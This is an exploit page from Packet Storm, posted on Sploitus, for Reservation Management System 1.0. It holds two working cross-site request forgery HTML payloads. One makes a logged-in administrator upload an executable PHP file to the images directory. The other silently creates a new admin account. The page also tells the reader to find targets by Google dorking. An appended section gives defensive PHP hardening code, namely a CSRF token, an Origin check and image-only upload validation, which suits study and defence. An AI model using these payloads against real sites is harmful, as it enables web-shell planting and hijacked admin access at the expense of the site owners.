## https://sploitus.com/exploit?id=PACKETSTORM:181532
=============================================================================================================================================  
| # Title : Reservation Management System 1.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or other search engines.  
  
[+] The following HTML form, when submitted by a logged-in administrator, uploads an executable malicious file remotely.  
  
[+] Line 8 : Set your target url  
  
[+] save payload as poc.html   
  
[+] payload :   
  
<div class="modal-content">  
<div class="modal-header">  
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>  
<h4 class="modal-title">Add New Menu</h4>  
</div>  
<div class="modal-body">  
<!--start form-->  
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data">  
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Menu Name</label>  
<div class="col-lg-8">   
<input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required="">  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Category</label>  
<div class="col-lg-8">   
<select class="form-control select2" id="exampleSelect1" name="cat" required="">  
<option value="9">Dessert</option>  
<option value="6">Main Course</option>  
<option value="7">Pasta</option>  
<option value="10">Rice</option>  
</select>  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Subcategory</label>  
<div class="col-lg-8">   
<select class="form-control select2" id="exampleSelect1" name="subcat">  
<option>Drinks</option>  
<option>Lunch and Dinner</option>  
<option>Mirienda</option>  
<option>Non Combo Meal</option>  
</select>  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Description</label>  
<div class="col-lg-8">   
<textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea>  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Price</label>  
<div class="col-lg-8">   
<input type="text" class="form-control" name="price" id="title" placeholder="Price" required="">  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Image</label>  
<div class="col-lg-8">   
<input type="file" class="form-control" name="image" id="title">  
</div>  
</div>   
  
<!-- Buttons -->  
<div class="form-group">  
<!-- Buttons -->  
<div class="col-lg-offset-2 col-lg-6">  
<button type="submit" class="btn btn-sm btn-primary">Save</button>  
<button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
</div>  
</div>  
</form>  
<!--end form-->  
</div>  
  
</div>  
  
[+] Ev!L : http://127.0.0.1/reservation/images/shopping.php  
  
-----------[+] Part 02 Add Admin [+]-------------------  
  
[+] Line 8 : Set your target url  
  
[+] save payload as poc.html   
  
[+] payload :   
  
<div class="modal-content">  
<div class="modal-header">  
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>  
<h4 class="modal-title">Add New User</h4>  
</div>  
<div class="modal-body">  
<!--start form-->  
<form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php">  
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="title">Full Name</label>  
<div class="col-lg-8">   
<input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required="">  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="username">Username</label>  
<div class="col-lg-8">   
<input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required="">  
</div>  
</div>   
<!-- Title -->  
<div class="form-group">  
<label class="control-label col-lg-2" for="password">Password</label>  
<div class="col-lg-8">   
<input type="password" class="form-control" name="password" id="password" placeholder="Write password" required="">  
</div>  
</div>   
  
<!-- Buttons -->  
<div class="form-group">  
<!-- Buttons -->  
<div class="col-lg-offset-2 col-lg-6">  
<button type="submit" class="btn btn-sm btn-primary">Save</button>  
<button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
</div>  
</div>  
</form>  
<!--end form-->  
</div>  
  
</div>  
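A defender-side countermeasure for both handlers targeted above (admin/menu_save.php in Part 01 and admin/user_save.php in Part 02), added here as an illustration and not code from the Reservation Management System itself: a synchronizer token bound to the admin session, an Origin check as defence in depth, and image-only upload validation with a server-chosen filename so the images/ directory cannot end up serving an uploaded PHP script. The file paths, function names and the hidden-field name csrf_token are assumptions.

```php
<?php
// Added hardening example (not the project's code) for a handler such as
// admin/menu_save.php or admin/user_save.php. Paths below are assumptions.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]); // PHP >= 7.3
session_start();

// Per-session token; the admin forms embed it as <input type="hidden" name="csrf_token">.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject any state-changing POST that does not carry the session's token.
function require_csrf_token(): void {
    $sent = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // Defence in depth: a form posted from another site carries a foreign Origin
    // (prefer a configured hostname over HTTP_HOST where the deployment allows it).
    $origin = $_SERVER['HTTP_ORIGIN'] ?? '';
    $self = (empty($_SERVER['HTTPS']) ? 'http://' : 'https://') . ($_SERVER['HTTP_HOST'] ?? '');
    if ($origin !== '' && $origin !== $self) {
        http_response_code(403);
        exit('Cross-origin request rejected');
    }
}

// Accept only real JPEG/PNG uploads and store them under a server-chosen name and
// extension, so this handler can never write a script like images/shopping.php.
function store_menu_image(array $file, string $dir): ?string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $allowed = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png'];
    $info = @getimagesize($file['tmp_name']);   // false when the file has no image header
    if ($info === false || !isset($allowed[$info[2]])) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
    return move_uploaded_file($file['tmp_name'], $dir . '/' . $name) ? $name : null;
}

require_csrf_token();
$image = isset($_FILES['image']) ? store_menu_image($_FILES['image'], __DIR__ . '/../images') : null;
// ... continue with the original INSERT using $_POST['menu'], $_POST['cat'], $image, etc.
```

The cross-site forms in the PoC above contain no csrf_token field, so with this check in place both requests are rejected with 403 before any file is written or any user is created.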
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================